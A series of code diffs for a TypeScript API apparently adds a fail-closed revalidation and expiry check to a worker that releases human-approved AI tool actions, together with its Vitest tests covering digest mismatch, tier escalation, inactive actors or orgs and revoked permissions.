+  it('rbac_denied: actor is still an active org member but no longer holds the tool permission', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // approved -> executing
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+    ]);
+    aiToolsMock.getToolTier.mockReturnValue(intent.riskTier);
+    actorContextMock.buildAuthContextForIntent.mockResolvedValueOnce(fakeAuth);
+    tenantStatusMock.getActiveOrgTenant.mockResolvedValueOnce({ orgId: intent.orgId, partnerId: 'partner-1' });
+    aiGuardrailsMock.checkToolPermission.mockResolvedValueOnce(
+      'Insufficient permissions: requires scripts.run',
+    );
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiGuardrailsMock.checkToolPermission).toHaveBeenCalledWith(
+      intent.actionName,
+      intent.arguments,
+      fakeAuth,
+    );
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'rbac_denied' }),
+    );
+    expect(auditMock.writeAuditEvent).toHaveBeenCalledWith(
+      expect.anything(),
+      expect.objectContaining({
+        result: 'failure',
+        details: expect.objectContaining({
+          errorCode: 'rbac_denied',
+          reason: 'Insufficient permissions: requires scripts.run',
+        }),
+      }),
+    );
+    expect(metricsMock.recordActionIntentMetric).toHaveBeenCalledWith(intent.source, intent.actionName, 'executed');
   });
 
   it('executeTool throws -> failed:execution_error, with executedAt stamped', async () => {

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -185,7 +185,7 @@ describe('releaseApprovedIntent', () => {
     await releaseApprovedIntent('intent-1');
 
     expect(intentServiceMock.transitionIntent).toHaveBeenCalledTimes(1);
-    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null });
+    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null }, { requireNotExpired: true });
     expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
     expect(actorContextMock.buildAuthContextForIntent).not.toHaveBeenCalled();
   });
@@ -488,6 +488,6 @@ describe('processIntentReleaseJob', () => {
     const result = await processIntentReleaseJob({ intentId: 'intent-1', eventType: 'intent_approved' });
 
     expect(result).toEqual({ released: true });
-    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null });
+    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null }, { requireNotExpired: true });
   });
 });

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -1,0 +1,441 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+// ---------------------------------------------------------------------------
+// Hoisted shared mock state
+// ---------------------------------------------------------------------------
+
+const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, aiToolsMock, authMock, auditMock, metricsMock, sentryMock } = vi.hoisted(() => {
+  const col = (name: string) => ({ name });
+  const actionIntentsTbl = { id: col('id') };
+  const approvalRequestsTbl = { id: col('id'), intentId: col('intent_id'), status: col('status') };
+
+  return {
+    schema: { actionIntentsTbl, approvalRequestsTbl },
+    dbState: {
+      selectActionIntentsResults: [] as unknown[][],
+      selectApprovalRequestsResults: [] as unknown[][],
+    },
+    intentServiceMock: { transitionIntent: vi.fn() },
+    actorContextMock: { buildAuthContextForIntent: vi.fn() },
+    tenantStatusMock: { getActiveOrgTenant: vi.fn() },
+    aiToolsMock: { getToolTier: vi.fn(), executeTool: vi.fn() },
+    authMock: { dbAccessContextFromAuth: vi.fn((auth: unknown) => ({ mock: 'dbContext', auth })) },
+    auditMock: {
+      writeAuditEvent: vi.fn(),
+      requestLikeFromSnapshot: vi.fn((..._args: unknown[]) => ({ req: { header: () => undefined } })),
+    },
+    metricsMock: {
+      recordActionIntentEvent: vi.fn(),
+      recordActionIntentMetric: vi.fn(),
+    },
+    sentryMock: { captureException: vi.fn() },
+  };
+});
+
+vi.mock('../db', () => ({
+  db: {
+    select: vi.fn(() => ({
+      from: vi.fn((table: unknown) => ({
+        where: vi.fn(() => ({
+          limit: vi.fn(() => {
+            if (table === schema.actionIntentsTbl) {
+              return Promise.resolve(dbState.selectActionIntentsResults.shift() ?? []);
+            }
+            if (table === schema.approvalRequestsTbl) {
+              return Promise.resolve(dbState.selectApprovalRequestsResults.shift() ?? []);
+            }
+            throw new Error('unexpected select table in mock');
+          }),
+        })),
+      })),
+    })),
+  },
+  withDbAccessContext: vi.fn(async (_ctx: unknown, fn: () => Promise<unknown>) => fn()),
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+  runOutsideDbContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+}));
+
+vi.mock('../db/schema/actionIntents', () => ({ actionIntents: schema.actionIntentsTbl }));
+vi.mock('../db/schema/approvals', () => ({ approvalRequests: schema.approvalRequestsTbl }));
+
+vi.mock('../services/redis', () => ({ getBullMQConnection: vi.fn(() => ({})) }));
+vi.mock('../services/sentry', () => ({ captureException: sentryMock.captureException }));
+vi.mock('../services/auditEvents', () => ({
+  writeAuditEvent: auditMock.writeAuditEvent,
+  requestLikeFromSnapshot: auditMock.requestLikeFromSnapshot,
+}));
+vi.mock('../services/actionIntents/metrics', () => ({
+  recordActionIntentEvent: metricsMock.recordActionIntentEvent,
+  recordActionIntentMetric: metricsMock.recordActionIntentMetric,
+}));
+vi.mock('../services/actionIntents/intentService', () => ({
+  transitionIntent: intentServiceMock.transitionIntent,
+}));
+vi.mock('../services/actionIntents/actorContext', () => ({
+  buildAuthContextForIntent: actorContextMock.buildAuthContextForIntent,
+}));
+vi.mock('../services/tenantStatus', () => ({
+  getActiveOrgTenant: tenantStatusMock.getActiveOrgTenant,
+}));
+vi.mock('../services/aiTools', () => ({
+  getToolTier: aiToolsMock.getToolTier,
+  executeTool: aiToolsMock.executeTool,
+}));
+vi.mock('../middleware/auth', () => ({
+  dbAccessContextFromAuth: authMock.dbAccessContextFromAuth,
+}));
+
+vi.mock('drizzle-orm', () => ({
+  eq: vi.fn((...args: unknown[]) => ({ op: 'eq', args })),
+  and: vi.fn((...args: unknown[]) => ({ op: 'and', args })),
+}));
+
+// bullmq is a real dependency we don't want to spin up — mock Worker/Job to
+// inert stand-ins since these tests only exercise the exported functions,
+// never `createWorker` itself.
+vi.mock('bullmq', () => ({
+  Worker: vi.fn().mockImplementation(() => ({ on: vi.fn(), close: vi.fn() })),
+  Job: class {},
+}));
+
+// ---------------------------------------------------------------------------
+// Import under test (after mocks)
+// ---------------------------------------------------------------------------
+
+import { releaseApprovedIntent, processIntentReleaseJob } from './intentReleaseWorker';
+import type { ActionIntent } from '../db/schema/actionIntents';
+
+function baseIntent(overrides: Partial<ActionIntent> = {}): ActionIntent {
+  return {
+    id: 'intent-1',
+    orgId: 'org-1',
+    partnerId: null,
+    requestedByUserId: 'user-1',
+    requestingApiKeyId: null,
+    source: 'chat',
+    requestingClientLabel: null,
+    actionName: 'run_script',
+    actionVersion: 1,
+    arguments: { scriptId: 'abc' },
+    argumentDigest: 'digest-1',
+    targetSummary: 'run_script(scriptId=abc)',
+    impactSummary: 'Runs a script',
+    reason: null,
+    riskTier: 3,
+    connectionId: null,
+    tenantId: null,
+    idempotencyKey: 'idem-1',
+    correlationId: 'corr-1',
+    status: 'executing',
+    createdAt: new Date(),
+    expiresAt: new Date(),
+    decidedAt: new Date(),
+    decidedByUserId: 'approver-1',
+    decidedAssuranceLevel: 1,
+    decidedVia: 'session_tap',
+    executedAt: null,
+    result: null,
+    errorCode: null,
+    ...overrides,
+  } as ActionIntent;
+}
+
+const fakeAuth = {
+  user: { id: 'user-1', email: 'a@b.com', name: 'A', isPlatformAdmin: false },
+  token: {},
+  partnerId: null,
+  orgId: 'org-1',
+  scope: 'organization' as const,
+  accessibleOrgIds: ['org-1'],
+  orgCondition: () => undefined,
+  canAccessOrg: () => true,
+};
+
+function resetDbState() {
+  dbState.selectActionIntentsResults.length = 0;
+  dbState.selectApprovalRequestsResults.length = 0;
+}
+
+/** Sets up the common happy-path mocks through the last revalidation step, before executeTool. */
+function primeThroughRevalidation(intent: ActionIntent) {
+  intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // approved -> executing
+  dbState.selectActionIntentsResults.push([intent]);
+  dbState.selectApprovalRequestsResults.push([
+    { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+  ]);
+  aiToolsMock.getToolTier.mockReturnValue(intent.riskTier);
+  actorContextMock.buildAuthContextForIntent.mockResolvedValueOnce(fakeAuth);
+  tenantStatusMock.getActiveOrgTenant.mockResolvedValueOnce({ orgId: intent.orgId, partnerId: 'partner-1' });
+}
+
+describe('releaseApprovedIntent', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    resetDbState();
+  });
+
+  it('double delivery: CAS approved->executing returns false — exits without touching anything else', async () => {
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(false);
+
+    await releaseApprovedIntent('intent-1');
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenCalledTimes(1);
+    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null });
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(actorContextMock.buildAuthContextForIntent).not.toHaveBeenCalled();
+  });
+
+  it('happy path: CAS -> revalidate -> executeTool -> CAS completed, with a JSON result', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    aiToolsMock.executeTool.mockResolvedValueOnce(JSON.stringify({ ok: true, message: 'done' }));
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> completed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).toHaveBeenCalledWith(intent.actionName, intent.arguments, fakeAuth);
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'completed',
+      expect.objectContaining({
+        result: { ok: true, message: 'done' },
+        executedAt: expect.any(Date),
+      }),
+    );
+    expect(metricsMock.recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ intentId: intent.id, outcome: 'executed' }),
+    );
+    expect(auditMock.writeAuditEvent).not.toHaveBeenCalled();
+  });
+
+  it('digest_mismatch: no winning approval row found -> failed, executeTool never called', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([]); // no approved row
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'digest_mismatch' }),
+    );
+    expect(auditMock.writeAuditEvent).toHaveBeenCalledWith(
+      expect.anything(),
+      expect.objectContaining({ result: 'failure', details: expect.objectContaining({ errorCode: 'digest_mismatch' }) }),
+    );
+    expect(metricsMock.recordActionIntentMetric).toHaveBeenCalledWith(intent.source, intent.actionName, 'executed');
+  });
+
+  it('digest_mismatch: winning approval digest no longer matches the intent', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: 'stale-digest' },
+    ]);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'digest_mismatch' }),
+    );
+  });
+
+  it('tier_escalated: getToolTier increased since intent creation', async () => {
+    const intent = baseIntent({ riskTier: 3 });
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+    ]);
+    aiToolsMock.getToolTier.mockReturnValue(4);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'tier_escalated' }),
+    );
+  });
+
+  it('tier_escalated: tool no longer exists (getToolTier undefined)', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+    ]);
+    aiToolsMock.getToolTier.mockReturnValue(undefined);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'tier_escalated' }),
+    );
+  });
+
+  it('actor_invalid: buildAuthContextForIntent returns null', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+    ]);
+    aiToolsMock.getToolTier.mockReturnValue(intent.riskTier);
+    actorContextMock.buildAuthContextForIntent.mockResolvedValueOnce(null);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(tenantStatusMock.getActiveOrgTenant).not.toHaveBeenCalled();
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'actor_invalid' }),
+    );
+  });
+
+  it('org_inactive: getActiveOrgTenant returns null', async () => {
+    const intent = baseIntent();
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([intent]);
+    dbState.selectApprovalRequestsResults.push([
+      { id: 'approval-1', status: 'approved', boundArgumentDigest: intent.argumentDigest },
+    ]);
+    aiToolsMock.getToolTier.mockReturnValue(intent.riskTier);
+    actorContextMock.buildAuthContextForIntent.mockResolvedValueOnce(fakeAuth);
+    tenantStatusMock.getActiveOrgTenant.mockResolvedValueOnce(null);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'org_inactive' }),
+    );
+  });
+
+  it('executeTool throws -> failed:execution_error, with executedAt stamped', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    aiToolsMock.executeTool.mockRejectedValueOnce(new Error('boom'));
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({ errorCode: 'execution_error', executedAt: expect.any(Date) }),
+    );
+    expect(auditMock.writeAuditEvent).toHaveBeenCalledWith(
+      expect.anything(),
+      expect.objectContaining({ details: expect.objectContaining({ error: 'boom' }) }),
+    );
+  });
+
+  it('result over 64 KiB is stored as {truncated:true}, and still completes', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    const hugeResult = JSON.stringify({ data: 'x'.repeat(70 * 1024) });
+    aiToolsMock.executeTool.mockResolvedValueOnce(hugeResult);
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'completed',
+      expect.objectContaining({ result: { truncated: true } }),
+    );
+    expect(metricsMock.recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ details: expect.objectContaining({ truncated: true }) }),
+    );
+  });
+
+  it('non-JSON string result is wrapped as {raw: ...}', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    aiToolsMock.executeTool.mockResolvedValueOnce('plain text result');
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'completed',
+      expect.objectContaining({ result: { raw: 'plain text result' } }),
+    );
+  });
+
+  it('lost the executing->completed CAS after real execution: logs, does not throw', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    aiToolsMock.executeTool.mockResolvedValueOnce(JSON.stringify({ ok: true }));
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(false); // lost completed CAS
+
+    await expect(releaseApprovedIntent(intent.id)).resolves.toBeUndefined();
+
+    expect(sentryMock.captureException).toHaveBeenCalled();
+    expect(metricsMock.recordActionIntentEvent).not.toHaveBeenCalled();
+  });
+
+  it('intent row missing after the CAS (unreachable in practice): logs and returns', async () => {
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true);
+    dbState.selectActionIntentsResults.push([]);
+
+    await expect(releaseApprovedIntent('intent-missing')).resolves.toBeUndefined();
+    expect(aiToolsMock.executeTool).not.toHaveBeenCalled();
+  });
+});
+
+describe('processIntentReleaseJob', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    resetDbState();
+  });
+
+  it('ignores non intent_approved events without touching the intent', async () => {
+    const result = await processIntentReleaseJob({ intentId: 'intent-1', eventType: 'intent_created' });
+
+    expect(result).toEqual({ released: false });
+    expect(intentServiceMock.transitionIntent).not.toHaveBeenCalled();
+  });
+
+  it('dispatches intent_approved to releaseApprovedIntent', async () => {
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(false); // exits immediately via double-delivery guard
+
+    const result = await processIntentReleaseJob({ intentId: 'intent-1', eventType: 'intent_approved' });
+
+    expect(result).toEqual({ released: true });
+    expect(intentServiceMock.transitionIntent).toHaveBeenCalledWith('intent-1', 'approved', 'executing', { executedAt: null });
+  });
+});

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -8,10 +8,8 @@ import { captureException } from '../services/sentry';
 import { writeAuditEvent, requestLikeFromSnapshot } from '../services/auditEvents';
 import { recordActionIntentEvent, recordActionIntentMetric } from '../services/actionIntents/metrics';
 import { transitionIntent } from '../services/actionIntents/intentService';
-import { buildAuthContextForIntent } from '../services/actionIntents/actorContext';
-import { getActiveOrgTenant } from '../services/tenantStatus';
-import { getToolTier, executeTool } from '../services/aiTools';
-import { checkToolPermission } from '../services/aiGuardrails';
+import { revalidateApprovedIntentForRelease } from '../services/actionIntents/revalidateRelease';
+import { executeTool } from '../services/aiTools';
 import { dbAccessContextFromAuth } from '../middleware/auth';
 
 /**
@@ -151,7 +149,17 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
   // (expiry, cancel, a prior delivery of this exact job, or the stale-
   // executing reaper already claimed it) — exit silently. This is what
   // makes repeated/duplicate `intent_approved` enqueues safe.
-  const claimed = await transitionIntent(intentId, 'approved', 'executing', { executedAt: null });
+  // requireNotExpired folds the deadline into the claim: an intent approved
+  // just before expires_at cannot be claimed for execution once past it (the
+  // 30s expiry reaper terminalizes the leftover approved row). Without this an
+  // action could execute after its authorization window closed.
+  const claimed = await transitionIntent(
+    intentId,
+    'approved',
+    'executing',
+    { executedAt: null },
+    { requireNotExpired: true },
+  );
   if (!claimed) {
     return;
   }
@@ -191,64 +199,18 @@ export async function releaseApprovedIntent(intentId: string): Promise<void> {
     return;
   }
 
-  // Revalidation chain (spec §5 step 2), IN ORDER. Each stop CASes
+  // Revalidation chain (spec §5 step 2) — the SHARED fail-closed checks (digest
+  // still bound, tier not escalated, actor still active + org-accessible, org
+  // still active, actor still holds the tool's RBAC), identical to the inline
+  // chat release path (services/aiAgentSdk.ts). Each stop CASes
   // executing -> failed with the exact error_code and returns WITHOUT ever
-  // calling executeTool.
-
-  // (a) The winning approval row must still be approved and must have
-  // approved the SAME content the intent currently carries. Should be
-  // impossible in practice (action_intents content is immutable, enforced
-  // by a DB trigger) — this is defense-in-depth, exactly as the spec's
-  // failure-mode table (§8) frames it.
-  if (!winningApproval || winningApproval.boundArgumentDigest !== intent.argumentDigest) {
-    await failIntent(intent, 'digest_mismatch');
+  // calling executeTool. The rebuilt `auth` is what this worker executes under.
+  const revalidation = await revalidateApprovedIntentForRelease(intent, winningApproval);
+  if (!revalidation.ok) {
+    await failIntent(intent, revalidation.errorCode, { details: revalidation.details });
     return;
   }
-
-  // (b) The tool must still exist and must not have been reclassified to a
-  // HIGHER tier since the intent was created (a lower/equal tier is fine —
-  // it only ever tightens, never loosens, what the approval covered).
-  const currentTier = getToolTier(intent.actionName);
-  if (currentTier === undefined || currentTier > intent.riskTier) {
-    await failIntent(intent, 'tier_escalated', {
-      details: { currentTier: currentTier ?? null, intentRiskTier: intent.riskTier },
-    });
-    return;
-  }
-
-  // (c) The actor must still be valid: rebuilds the AuthContext from
-  // scratch, re-checking the user is active and still has org access.
-  const auth = await buildAuthContextForIntent(intent);
-  if (!auth) {
-    await failIntent(intent, 'actor_invalid');
-    return;
-  }
-
-  // (d) The org must still be active (not suspended/churned/deleted, and
-  // its owning partner must still be active too — getActiveOrgTenant
-  // cascades through getActivePartner).
-  const activeOrg = await getActiveOrgTenant(intent.orgId);
-  if (!activeOrg) {
-    await failIntent(intent, 'org_inactive');
-    return;
-  }
-
-  // (e) The actor must STILL hold the specific RBAC permission the tool
-  // requires, checked against the rebuilt `auth` from step (c) — not the
-  // caller's original, now possibly stale, permission check. This is the
-  // core durability guarantee (spec §5 "user active with required RBAC";
-  // §10.3 "approval is not a timeless bearer capability"): an intent can sit
-  // `approved` for minutes to (mcp_api, 24h expiry) hours, and the actor may
-  // have been demoted to a lesser role in that window while remaining an
-  // active org member (which alone only trips (c) `actor_invalid`).
-  // `buildAuthContextForIntent` populates `auth.token.roleId` from freshly
-  // resolved permissions (never null for a real user), so this call cannot
-  // fail open via checkToolPermission's helper-session bypass.
-  const permissionDenial = await checkToolPermission(intent.actionName, intent.arguments, auth);
-  if (permissionDenial) {
-    await failIntent(intent, 'rbac_denied', { details: { reason: permissionDenial } });
-    return;
-  }
+  const { auth } = revalidation;
 
   // Step 3: execute through the existing dispatch (guardrails, device
   // gates, and whatever per-tool audit/ledger writes the handler itself

--- a/apps/api/src/jobs/intentReleaseWorker.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.ts
@@ -1,0 +1,370 @@
+import { Job, Worker } from 'bullmq';
+import { and, eq } from 'drizzle-orm';
+import { db, withDbAccessContext, withSystemDbAccessContext, runOutsideDbContext } from '../db';
+import { actionIntents, type ActionIntent } from '../db/schema/actionIntents';
+import { approvalRequests } from '../db/schema/approvals';
+import { getBullMQConnection } from '../services/redis';
+import { captureException } from '../services/sentry';
+import { writeAuditEvent, requestLikeFromSnapshot } from '../services/auditEvents';
+import { recordActionIntentEvent, recordActionIntentMetric } from '../services/actionIntents/metrics';
+import { transitionIntent } from '../services/actionIntents/intentService';
+import { buildAuthContextForIntent } from '../services/actionIntents/actorContext';
+import { getActiveOrgTenant } from '../services/tenantStatus';
+import { getToolTier, executeTool } from '../services/aiTools';
+import { dbAccessContextFromAuth } from '../middleware/auth';
+
+/**
+ * Durable release worker (spec
+ * docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §5 / §10.3 / §8) — consumes `intent_approved` jobs off the `action-intents`
+ * BullMQ queue (populated by `jobs/intentOutboxPublisher.ts`) and, for each,
+ * re-validates the approval is still good and RE-EXECUTES the tool through a
+ * freshly rebuilt actor identity.
+ *
+ * SECURITY-CRITICAL trust boundary: a reconstructed identity is about to
+ * execute a real, privileged Tier-3 action on behalf of a decision made
+ * possibly minutes to (for `mcp_api` intents) a day earlier. Every step below
+ * is fail-closed — any doubt CASes the intent straight to `failed` with a
+ * categorized `error_code` and skips execution entirely. Never a silent
+ * no-op, never a downgrade to "execute anyway."
+ *
+ * Job data: `{ intentId, eventType }`. Only `eventType === 'intent_approved'`
+ * is acted on; anything else is acknowledged as a no-op (forward-compat with
+ * `intent_created`, which this worker does not consume).
+ *
+ * CAS-idempotent by construction: the `approved -> executing` transition at
+ * step 1 is a single-use release guard (mirrors the PAM `actuating` pattern).
+ * A duplicate delivery of the same job (BullMQ jobId dedupe normally
+ * prevents this, but retries happen) finds the intent already
+ * `executing`/terminal, the CAS returns zero rows, and the handler exits
+ * without calling `executeTool` a second time.
+ */
+
+const ACTION_INTENTS_QUEUE_NAME = 'action-intents';
+const MAX_RESULT_BYTES = 64 * 1024; // 64 KiB (spec §5 step 4)
+
+type IntentReleaseJobData = { intentId: string; eventType: string };
+
+let releaseWorker: Worker<IntentReleaseJobData> | null = null;
+
+/**
+ * Minimal, dependency-free equivalent of `aiAgentSdk.ts`'s `safeParseJson`:
+ * normalizes a tool's raw string result into a JSON object suitable for the
+ * `action_intents.result` jsonb column. Deliberately NOT imported from
+ * `aiAgentSdk.ts` — that module pulls in the entire chat-session dependency
+ * graph (streaming session manager, cost tracker, M365 helpers, ...), which
+ * has no business being a transitive dependency of the release worker for
+ * the sake of one pure formatting helper. Same fallback shape as the chat
+ * SDK's normalization (`{ value }` for non-object JSON, `{ raw }` for
+ * non-JSON text) so a stored intent result and a stored ai_tool_executions
+ * result look the same to anything reading either.
+ */
+function normalizeToolResult(raw: string): Record<string, unknown> {
+  try {
+    const parsed = JSON.parse(raw);
+    if (parsed !== null && typeof parsed === 'object' && !Array.isArray(parsed)) {
+      return parsed as Record<string, unknown>;
+    }
+    return { value: parsed };
+  } catch {
+    return { raw };
+  }
+}
+
+/**
+ * Writes the `action_intent.executed` audit row + Prometheus counter for a
+ * FAILED release (any revalidation stop, or a thrown `executeTool`).
+ *
+ * Does NOT use `recordActionIntentEvent`: its `ActionIntentOutcome` enum
+ * (services/actionIntents/metrics.ts) only treats `rejected` / `expired` /
+ * `cancelled` as audit failures (`FAILURE_OUTCOMES`) — there is no "outcome
+ * executed, but it failed" member, so recording outcome `'executed'` through
+ * that helper would mis-file every release failure as `result: 'success'`.
+ * This mirrors the exact fallback `jobs/intentExpiryReaper.ts`'s
+ * `reapStaleExecutingIntents` already uses for the same enum gap: write the
+ * audit row directly with `result: 'failure'`, then bump the Prometheus
+ * counter separately via `recordActionIntentMetric` so `executed` totals
+ * still include this path.
+ */
+function auditReleaseFailure(
+  intent: ActionIntent,
+  errorCode: string,
+  details?: Record<string, unknown>,
+): void {
+  try {
+    writeAuditEvent(requestLikeFromSnapshot({}), {
+      orgId: intent.orgId,
+      action: 'action_intent.executed',
+      resourceType: 'action_intent',
+      resourceId: intent.id,
+      actorType: 'system',
+      actorId: null,
+      result: 'failure',
+      details: {
+        actionName: intent.actionName,
+        argumentDigest: intent.argumentDigest,
+        source: intent.source,
+        errorCode,
+        ...details,
+      },
+    });
+    recordActionIntentMetric(intent.source, intent.actionName, 'executed');
+  } catch (err) {
+    console.error(`[IntentReleaseWorker] Failed to write failure audit for intent ${intent.id}:`, err);
+    captureException(err instanceof Error ? err : new Error(String(err)));
+  }
+}
+
+/**
+ * CAS `executing -> failed` with the given `error_code`, then (only if the
+ * CAS actually won) writes the failure audit/metric. `executed: true` also
+ * stamps `executedAt` — used only for `execution_error`, where a real
+ * attempt was made; the earlier revalidation stops (digest/tier/actor/org)
+ * never touched execution, so they leave `executedAt` null.
+ */
+async function failIntent(
+  intent: ActionIntent,
+  errorCode: string,
+  options: { details?: Record<string, unknown>; executed?: boolean } = {},
+): Promise<void> {
+  const won = await transitionIntent(intent.id, 'executing', 'failed', {
+    errorCode,
+    ...(options.executed ? { executedAt: new Date() } : {}),
+  });
+  if (!won) {
+    // Lost the race — e.g. the stale-executing reaper (jobs/intentExpiryReaper.ts)
+    // already flipped this intent to failed:execution_lost, or a duplicate
+    // job delivery got here first. The intent is terminal either way; avoid
+    // a duplicate audit write for an event that already happened once.
+    return;
+  }
+  auditReleaseFailure(intent, errorCode, options.details);
+}
+
+/**
+ * Processes one `intent_approved` job end to end. Exported for direct
+ * testing without spinning up a real BullMQ Worker.
+ */
+export async function releaseApprovedIntent(intentId: string): Promise<void> {
+  // Step 1 (spec §5.1): the single-use release guard. Zero rows = lost race
+  // (expiry, cancel, a prior delivery of this exact job, or the stale-
+  // executing reaper already claimed it) — exit silently. This is what
+  // makes repeated/duplicate `intent_approved` enqueues safe.
+  const claimed = await transitionIntent(intentId, 'approved', 'executing', { executedAt: null });
+  if (!claimed) {
+    return;
+  }
+
